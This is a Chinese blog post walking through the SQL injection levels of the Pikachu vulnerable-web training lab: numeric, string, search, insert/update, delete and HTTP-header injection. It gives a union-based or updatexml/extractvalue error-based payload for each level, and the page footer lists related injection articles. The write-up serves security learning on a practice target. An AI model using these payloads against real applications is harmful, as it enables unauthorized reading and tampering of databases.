pickachu漏洞学习---------sql注入篇

最新推荐文章于 2023-05-29 01:14:29 发布
最新推荐文章于 2023-05-29 01:14:29 发布
阅读量1k 收藏 2
点赞数 1
分类专栏: pikachu sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42133828/article/details/88524664
版权

1.数字型注入(POST):

 

源码

payload: -1' union select 1,2 #

 

2.字符型注入(GET):

源码:

payload: 0'union select 1,database() #

 

3.搜索型注入

源码:

payload: 0' union select 1,2,database() #

 

4.XX型注入:

源码:

payload:0')union select 2,database() #

 

5.insert/update注入:

登陆框:

注册框:

 

 注册页面的源码:

 修改信息界面:

 修改信息源码:

payload:1'or updatexml(1,concat(0x7e,(database())),0) or '

 

6.delete注入:

源码:

payload: 110 or extractvalue(1,concat(0x5e24,(database()))) or ''

 

 

7.http headr 头部注入:

账号:admin  密码:123456

源码:

payload:1' or updatexml(1,concat(0x7e,(database())),0) or '

抓包修改:

 

 

 

 

 

 

 

 

 

 

 

 

南人旧心1906
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
ORACLE数据库教程-SQL学习.ppt
11-21
ORACLE数据库教程-SQL学习.ppt
SQL2022-SSEI-Dev
11-14
SQL2022-SSEI-Dev
ORACLE-SQL语句学习教程解读.pdf
06-24
ORACLE-SQL语句学习教程解读.pdfORACLE-SQL语句学习教程解读.pdfORACLE-SQL语句学习教程解读.pdfORACLE-SQL语句学习教程解读.pdfORACLE-SQL语句学习教程解读.pdfORACLE-SQL语句学习教程解读.pdf
pikachu-master.zip
02-14
pikachu是一个很不错的漏洞靶场,适合学习web漏洞学习,建议在学习的时候也可以多多看看后端代码,黑盒与白盒学习相结合更容易深刻理解漏洞原理。
sql-labs通关技巧
03-01
SQL注入常用靶场的通关技巧
Pickachu第四弹:SQL注入
Pisces_mango的博客
09-03 1022
目录 一、数字型注入(post) 二、字符型输入(get) 三、搜索型注入 四、xx型注入 五、“insert/update”注入 六、“delete”型注入 七、“http header”注入 八、盲注(base on boolian) 九、盲注(base on time) 十、宽字节注入 十一、手工测试流程 十二、报错利用流程 一、数字型注入(post) 看到输入点后,我们想象一下它在数据库中是怎样操作的,select 字段1,字段2 from 表名 where id=1
SQL注入相关知识点
bingo_csdn的博客
10-23 173
1、MySQL默认在数据库中存放一个"infomation_schema"的数据库,在该库中,需要记住三个表名:SCHEMATA(存储所有数据库的库名) TABLES(存储所有数据库的库名和表名) COLUMNS(存储所有数据库的库名,表名和字段名) 2、常见注释符:#或--空格或/**/ 3、内联注释:/*!UNION*/ 4、limit的用法:limit m,n 从m(零开始)开始取n条记录 5、union 6、order by 7、select 1,2,3,select直接加数字串..
pikachu靶场通关技巧详解
henghengzhao_的博客
10-13 6749
pikachu靶场全部漏洞详解,不懂可以留言,作者会及时回复
pikachuSQL注入
qq_58091216的博客
11-04 2225
SQL注入(SQLi)是一种注入攻击,可以执行恶意SQL语句。它通过将任意SQL代码插入数据库查询,使攻击者能够完全控制Web应用程序后面的数据库服务器。攻击者可以使用SQL注入漏洞绕过应用程序安全措施;可以绕过网页或Web应用程序的身份验证和授权,并检索整个SQL数据库的内容;还可以使用SQL注入来添加,修改和删除数据库中的记录。
pikachu靶场通关指南
weixin_43110519的博客
10-06 2134
pikachu靶场记录
sql-server驱动包
最新发布
03-07
sql-server驱动包
第十六届全国大学生信息安全竞赛创新实践能力赛 初赛 Writeup By AheadSec
末初的CSDN博客
05-29 2373
第十六届全国大学生信息安全竞赛创新实践能力赛 Writeup By AheadSec
pikachu下载及安装-图文详解+phpStudy配置
wzhua的博客
09-13 1万+
pikachu下载及安装-图文详解+phpStudy配置
2019年CTF3月比赛记录(一):BSidesSF 2019 CTF_Web部分题目writeup与重解
極品━═☆宏的博客
03-07 3918
2019年CTF比赛记录(一) 为了更好地学习CTF方面的相关知识,本着以赛促学的目的,决定自己报名参加一些2019年的CTF比赛,在比赛中去学其他的知识,帮助自己更好的学习Web方面的知识。限于个人能力有限,而且在时间上的限制,比赛中仅对自己当时看到的题目和解出的题目进行了解答。 比赛:BSidesSF 2019 CTF 时间:2019年3月4日至2019年3月5日 ...
sql注入之select/union select
@一只躺平的猪@的博客
07-14 2791
select :select 1 from table、 select count(1) from table、select sum(1) from table union select:union语句使用条件、判断字段数 union select 1,2(或union select null,null)、 判断回显位置
SQL注入复习 -攻防世界web【NewsCenter】
weixin_53146913的博客
04-18 169
sql注入语句复习 ' and 0 union select 1,2,3# 初步判断该sql查询返回三列数据. 1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()# 得到表名,很明显我们需要得到 secret_table 表中的内容 ' and 0 union select 1,column_name,data_type from infor
sql注入-union select
热门推荐
我不是大牛
06-24 2万+
什么是SQL注入 SQL注入(Sql Injection ) 是一种将SQL语句插入或添加到应用(用户)的输入参数中的攻击 这些参数传递给后台的SQL数据库服务器加以解析并执行 哪里存在SQL注入? GET POST HTTP头部注入 Cookie注入 任何客户端可控,传递到服务器的变量,并且和数据库进行交互,都有可能存在sql注入SQL注入的分类 根据SQL数据类型分类 整型注...
几种SQL注入(insert,update,delete,`, \ 等。。。)
qq_42133828的博客
03-23 7881
insert注入: $sql = "insert into user(username,password) values('$username','$password',)"; payload: 适用于字符型: ' or updatexml(1,concat(0x7e,(database())),0) or ' 适用于数字型: ' or extractva...
SQL注入漏洞-手工注入
05-21
对于SQL注入漏洞的手工注入,建议使用一些工具来进行测试,如SQLMap、Havij等。这些工具可以通过一些特定的语句来测试目标网站是否存在SQL注入漏洞,并且可以自动化执行攻击,并且提供详细的攻击日志,方便测试人员...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值